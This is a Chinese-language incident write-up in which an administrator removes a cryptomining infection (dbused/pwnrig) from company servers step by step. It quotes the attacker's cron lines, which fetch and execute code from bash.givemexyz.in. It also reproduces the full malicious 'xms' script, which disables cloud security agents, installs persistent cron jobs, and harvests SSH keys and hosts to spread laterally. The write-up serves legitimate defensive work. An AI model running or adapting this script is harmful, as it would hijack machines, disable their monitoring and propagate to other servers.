目录

杀毒记一

国庆期间,公司有几台服务器不慎被黑。查杀病毒,修复被搞挂的服务,几乎耗费我一天时间,幸好都是基础服务,没有影响业务。对于这种常见的挖矿攻击,总结下来还是有些用处的,故作此文以记之。

基本工作

首先,千万别慌,病毒也是程序,是程序基本就能干掉。

先了解下影响范围,如果用的阿里云,强烈推荐购买云安全中心服务,能快速定位受影响的ECS。

接下来给受影响的 ECS 断网,当然不是拔网线。而是找到病毒向外〝勾搭〞的异常 ip,封杀之。可在安全组中添加,也可在 ECS 本身的防火墙上添加。

1
netstat -ntp

被挖矿后,主要表现就是负载巨高,CPU 占用率〝爆表〞,结果导致正常服务挂掉。

可利用如下命令查找 CPU 占用前十的进程(也可使用 top,键入大写 P,按 CPU 占用排序)

1
ps -A --sort -%cpu -o comm,pmem,pcpu |uniq -c |head -10

本次攻击主要是dbused进程占用最高,kill -9是杀不死的,因为有定时任务不断重启。

主要是下面这两个进程不断去http://bash.givemexyz.in/xms下载 bash 脚本然后执行

1
2
3
curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms

 bash -c (curl -fsSL http://209.141.40.190/xms||wget -q -O- http://209.141.40.190/xms|...

现在我们找到了挖矿程序,也封了他们的去路,接下来就是瓮中捉鳖了。

开始杀毒

清理.bash_profile

这个挖矿脚本的恶心之处就是让你防不胜防,它会在.bash_profile之植入恶意语句,如果你清理完定时任务及病毒,以为没事了,下次登录这台机器,触发了.bash_profile,又会去执行挖矿,所以我强烈建议你先清理.bash_profile中的恶意语句,甚至连.bashrc也要检查下

~/.bash_profile中恶意语句主要是下面这个

1
cp -f -r -- /bin/bprofr /bin/dbused 2>/dev/null && /bin/dbused -c  >/dev/null 2>&1 && rm -rf -- /bin/dbused 2>/dev/null

使用如下命令先解锁文件再删掉其中的恶意语句

1
chattr -ia ~/.bash_profile

清理定时任务

这个挖矿病毒的主要特点就是定时任务巨多,稍不留神就会有漏网之鱼,好在我找到了其所有的藏身之所。

查看定时任务

1
2
>  crontab -l
* * * * *       (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms

执行crontab -r是清理不掉的

查看所有定时任务

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
>ll /etc/cron*
-rw-------. 1 root root    0 Oct  8  2019 /etc/cron.deny
-rw-r--r--. 1 root root  451 Nov 22  2016 /etc/crontab

/etc/cron.d:
total 32
-rw-r--r--. 1 root root 128 Oct  8  2019 0hourly
-rw-r--r--  1 root root 284 Oct  5 11:17 apache
-rw-r--r--  1 root root 284 Oct  5 11:17 nginx
-rwxr-xr-x  1 root root 139 Oct  5 01:18 pwnrig
-rw-r--r--. 1 root root 108 Nov 27  2020 raid-check
-rw-r--r--  1 root root 284 Oct  5 11:17 root
-rw-------. 1 root root 235 May 12  2020 sysstat
-rw-r--r--  1 root root 191 Nov 27  2020 update-motd

/etc/cron.daily:
total 16
-rwx------. 1 root root 219 May  6  2020 logrotate
-rwxr-xr-x. 1 root root 618 Dec  8  2018 man-db.cron
-rwx------. 1 root root 208 Dec  8  2018 mlocate
-rwxr-xr-x  1 root root 139 Oct  5 01:18 pwnrig

/etc/cron.hourly:
total 12
-rwxr-xr-x. 1 root root 392 Oct  8  2019 0anacron
-rwxr-xr-x  1 root root 264 Oct  5 11:17 oanacroner1
-rwxr-xr-x  1 root root 139 Oct  5 01:18 pwnrig

/etc/cron.monthly:
total 4
-rwxr-xr-x 1 root root 139 Oct  5 01:18 pwnrig

/etc/cron.weekly:
total 4
-rwxr-xr-x 1 root root 139 Oct  5 01:18 pwnrig

注意观察修改时间,本次攻击的恶意定时任务文件如下:

  • /etc/cron.d/apache
  • /etc/cron.d/nginx
  • /etc/cron.d/pwnrig
  • /etc/cron.d/root
  • /etc/cron.daily/pwnrig
  • /etc/cron.monthly/pwnrig
  • /etc/cron.weekly

实际上还有两个恶意定时文件,如下

  • /var/spool/cron/crontabs/root
  • /var/spool/cron/root

内容如下:

1
2
3
4
* * * * *       (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms

*/30 * * * *    (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms
##

这些文件也是删不掉的,会报如下错误

1
rm: cannot remove ‘root’: Operation not permitted

我去,我都是 root 了都会删不掉你。别急,解锁即可。

/etc/cron.d/pwnrig这个文件

1
2
3
4
5
6
7
8
9
> rm -rf /etc/cron.d/pwnrig
rm: cannot remove ‘/etc/cron.d/pwnrig’: Operation not permitted
> lsattr /etc/cron.d/pwnrig
----ia-------e-- /etc/cron.d/pwnrig

> chattr -ia /etc/cron.d/pwnrig
> lsattr /etc/cron.d/pwnrig
-------------e-- /etc/cron.d/pwnrig
> rm -rf /etc/cron.d/pwnrig

删除所有恶意定时任务

1
2
chattr -ia /etc/{cron.monthly,cron.weekly}/pwnrig /var/spool/cron/{root,crontabs/root} /etc/cron.daily/pwnrig /etc/cron.hourly/{oanacroner1,pwnrig} /etc/cron.d/{apache,nginx,pwnrig,root}
rm -rf /etc/{cron.monthly,cron.weekly}/pwnrig /var/spool/cron/{root,crontabs/root} /etc/cron.daily/pwnrig /etc/cron.hourly/{oanacroner1,pwnrig} /etc/cron.d/{apache,nginx,pwnrig,root}

定时任务是删除了,但那些任务进程还在,清理之,因为都有一个关键字 xms,所以执行如下操作清理即可

1
ps -ef | grep xms | grep -v grep  | awk '{print $2}' | xargs kill -9

如果你执行上述步骤,发现恶意定时任务还会产生,那可能是因为有其他机器通过 ssh 连接到你这台机器,然后下载恶意脚本并执行。使用下面的命令清理掉,然后再执行下上面的定时任务清理命令。

1
ps -ef | grep ssh | grep -v "D" | grep -v "pts" | awk '{print $2}' | xargs kill -9

为避免误杀,可先执行ps -ef | grep ssh | grep -v "D" | grep -v "pts"查看下结果

相关进程如下,脚本会去遍历服务器上known_hosts,拿到相关的 ip 后,再遍历服务器上的密钥通过 ssh 去连接这些密钥,从而实现横向扩展。所以建议内部机器之间就不要互相通过 ssh 连接了,统一通过堡垒机连接。

1
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i /root/.ssh/xxx.pem root@172.26.xxx.xxx (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms

清理挖矿程序

没有定时任务后,挖矿进程(dbused,bashirc),一杀即死

1
ps -ef | grep -E 'dbused|bashirc' | grep -v grep  | awk '{print $2}' | xargs kill -9

还有/tmp 中一些残留的文件一并删掉

1
2
cd /tmp
rm -rf dbused scan.log sshcheck scan ranges ranges.txt hxx pas pscan scan bashirc ssh_vuln.txt

删掉恶意二进制程序

1
2
3
chattr -ia /bin/bprofr /bin/sysdr /bin/crondr /bin/initdr /usr/bin/bprofr /usr/bin/sysdr/ /usr/bin/crondr /usr/bin/initdr

rm -rf /bin/bprofr /bin/sysdr /bin/crondr /bin/initdr /usr/bin/bprofr /usr/bin/sysdr/ /usr/bin/crondr /usr/bin/initdr

这样,恶意文件就删完了么,并没有,接下来使用find大法,因为是今天开始攻击的,查看一天内新增的文件即可,命令如下

1
2
3
4
5
[root@jtjy-nacos ~]# find /etc -type f  -ctime -1 -print
/etc/ld.so.preload
/etc/systemd/system/pwnrige.service
/etc/systemd/system/multi-user.target.wants/pwnrige.service
/etc/systemd/system/multi-user.target.wants/pwnrigl.service

使用如下命令删除

1
 find /etc -type f  -ctime -1 -print | xargs chattr -ia && find /etc -type f  -ctime -1 -print | xargs rm -rf

从上可知,恶意脚本把pwnrige配置成systemd 服务了,所以仅搜索/etc下文件还是不行的

1
2
3
4
> find / -name "pwnrig*"
/usr/lib/systemd/system/pwnrigl.service
/etc/systemd/system/multi-user.target.wants/pwnrige.service
/etc/systemd/system/multi-user.target.wants/pwnrigl.service

跟上面一样,删掉它们。这时,可看到pwnrige服务状态是失败的

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
> systemctl status pwnrige
● pwnrige.service
   Loaded: not-found (Reason: No such file or directory)
   Active: failed (Result: start-limit) since Tue 2021-10-05 01:20:45 CST; 10h ago

Oct 05 01:20:45 jtjy-nacos systemd[1]: Started pwnrig.
Oct 05 01:20:45 jtjy-nacos systemd[1]: pwnrige.service holdoff time over, scheduling ...rt.
Oct 05 01:20:45 jtjy-nacos systemd[1]: Stopped pwnrig.
Oct 05 01:20:45 jtjy-nacos systemd[1]: start request repeated too quickly for pwnrige...ice
Oct 05 01:20:45 jtjy-nacos systemd[1]: Failed to start pwnrig.
Oct 05 01:20:45 jtjy-nacos systemd[1]: Unit pwnrige.service entered failed state.
Oct 05 01:20:45 jtjy-nacos systemd[1]: pwnrige.service failed.
Hint: Some lines were ellipsized, use -l to show in full.

虽然pwnrige服务已失效,但还能看到,很烦人。没关系,使用如下命令重载即可。

1
systemctl daemon-reload

恶意脚本

如果实在不知道还有哪些恶意文件没有被删,可以直接去下载恶意脚本观摩下,完整脚本如下

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
#!/bin/bash
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
setenforce 0 2>/dev/null
ulimit -u 50000
sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))
netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '23.94.24.12:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '134.122.17.13:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
netstat -antp | grep '107.189.11.170:443'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
rand=$(seq 0 255 | sort -R | head -n1)
rand2=$(seq 0 255 | sort -R | head -n1)
chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down

if ps aux | grep -i '[a]liyun'; then
  (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
  (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  rm -rf /usr/local/aegis*
  systemctl stop aliyun.service
  systemctl disable aliyun.service
  service bcm-agent stop
  yum remove bcm-agent -y
  apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo "DER Uninstalled"

chattr -ai /tmp/dbused

if [ -s /usr/bin/ifconfig ];
then
	range=$(ifconfig | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
else
	range=$(ip a | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
fi

if [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
then
        dns=""
else
        dns="-d"
fi

if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
then
        url="http://bash.givemexyz.in"
else
        url="http://209.141.32.105"
fi


echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/apache
echo -e "*/3 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/nginx
echo -e "*/30 * * * *	(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * *	(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
echo "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1

DIR="/tmp"
cd $DIR

if [ -a "/tmp/dbused" ]
then
    if [ -w "/tmp/dbused" ] && [ ! -d "/tmp/dbused" ]
    then
        if [ -x "$(command -v md5sum)" ]
        then
            sum=$(md5sum /tmp/dbused | awk '{ print $1 }')
            echo $sum
            case $sum in
                dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
                    echo "x86_64 OK"
                ;;
                *)
                    echo "x86_64 wrong"
                    rm -rf /usr/local/lib/libkk.so
                    echo "" > /etc/ld.so.preload
                    pkill -f wc.conf
                    pkill -f susss
                    sleep 4
                ;;
            esac
        fi
        echo "P OK"
    else
        DIR=$(mktemp -d)/tmp
        mkdir $DIR
        echo "T DIR $DIR"
    fi
else
    if [ -d "/tmp" ]
    then
        DIR="/tmp"
    fi
    echo "P NOT EXISTS"
fi
if [ -d "/tmp/.sh/dbused" ]
then
    DIR=$(mktemp -d)/tmp
    mkdir $DIR
    echo "T DIR $DIR"
fi

get() {
  chattr -i $2; rm -rf $2
  wget -q -O - $1 > $2 || curl -fsSL $1 -o $2 ||  lwp-download $1 $2 ||
  chmod +x $2
}


downloadIfNeed()
{
    if [ -x "$(command -v md5sum)" ]
    then
        if [ ! -f $DIR/dbused ]; then
            echo "File not found!"
            download
        fi
        sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
        echo $sum
        case $sum in
            dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
                echo "x86_64 OK"
            ;;
            *)
                echo "x86_64 wrong"
                sizeBefore=$(du $DIR/x86_64)
                if [ -s /usr/bin/curl ];
                then
                    WGET="curl -k -o ";
                fi
                if [ -s /usr/bin/wget ];
                then
                    WGET="wget --no-check-certificate -O ";
                fi
                download
                sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
                if [ -s /usr/bin/curl ];
                then
                    echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sssus` > $DIR/tmp.txt
                fi
            ;;
        esac
    else
        echo "No md5sum"
        download
    fi
}


download() {
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')
        echo $sum
        case $sum in
            dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
                echo "x86_64 OK"
                cp $DIR/x86_643 $DIR/x86_64
				        cp $DIR/x86_643 $DIR/x86_64
            ;;
            *)
                echo "x86_64 wrong"
                download2
            ;;
        esac
    else
        echo "No md5sum"
        download2
    fi
}

download2() {
	get $url/$(uname -m) "$DIR"/dbused
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
        echo $sum
        case $sum in
            dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
                echo "x86_64 OK"
                cp $DIR/x86_64 $DIR/x86_643
            ;;
            *)
                echo "x86_64 wrong"
            ;;
        esac
    else
        echo "No md5sum"
    fi
}

judge() {
    if [ ! "$(netstat -ant|grep '212.114.52.24:8080\|194.5.249.24:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
    then
        get $url/$(uname -m) "$DIR"/dbused
        chmod +x "$DIR"/dbused
        "$DIR"/dbused -c $dns
        "$DIR"/dbused -pwn
        sleep 5
    else
	echo "Running"
    fi
}

if [ ! "$(netstat -ant|grep '212.114.52.24:8080\|194.5.249.24:8080'|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
    judge
else
     echo "Running"
fi

if [ ! "$(netstat -ant|grep '104.168.71.132:80'|grep 'ESTABLISHED'|grep -v grep)" ];
then
    get $url/bashirc.$(uname -m) "$DIR"/bashirc
    chmod 777 "$DIR"/bashirc
    "$DIR"/bashirc
else
	echo "Running"
fi

cronbackup() {
 pay="(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR" 
 status=0 
 crona=$(systemctl is-active cron) 
 cronb=$(systemctl is-active crond) 
 cronatd=$(systemctl is-active atd) 
 if [ "$crona" == "active" ] ; then 
 echo "cron okay" 
 elif [ "$cronb" == "active" ]; then 
 echo "cron okay" 
 elif [ "$cronatd" == "active" ] ; then 
 status=1 
 else 
 status=2 
 fi 
 if [ $status -eq 1 ] ; then 
 for a in $(at -l|awk '{print $1}'); do at -r $a; done 
 echo "$pay" | at -m now + 1 minute 
 fi 
 if [ $status -eq 2 ] || [ "$me" != "root" ] ;then
  arr[0]="/dev/shm"
  arr[1]="/tmp"
  arr[2]="/var/tmp"
  arr[3]="/home/$(whoami)"
  arr[4]="/run/user/$(echo $UID)"
  arr[5]="/run/user/$(echo $UID)/systemd" 
  rand=$[$RANDOM % ${#arr[@]}]
 echo "Setting up custom backup" 
 ps auxf|grep -v grep|grep "cruner" | awk '{print $2}'|xargs kill -9 
 key="while true; do sleep 60 && $pay; done" 
 echo -e "$key\n##" > ${arr[$rand]}/cruner && chmod 777 ${arr[$rand]}/cruner 
 nohup ${arr[$rand]}/cruner >/dev/null 2>&1 &
 sleep 15 
 rm -rf ${arr[$rand]}/cruner 
 fi 
 } 
cronbackup


if crontab -l | grep -q "$url\|209.141.59.189"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    echo "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" | crontab -
fi

KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
)
userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
for user in $userlist; do
    for host in $hostlist; do
        for key in $keylist; do
            chmod +r $key; chmod 400 $key
            ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms"
        done
    done
done

rm -rf "$DIR"/2start.jpg
rm -rf "$DIR"/xmi
chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down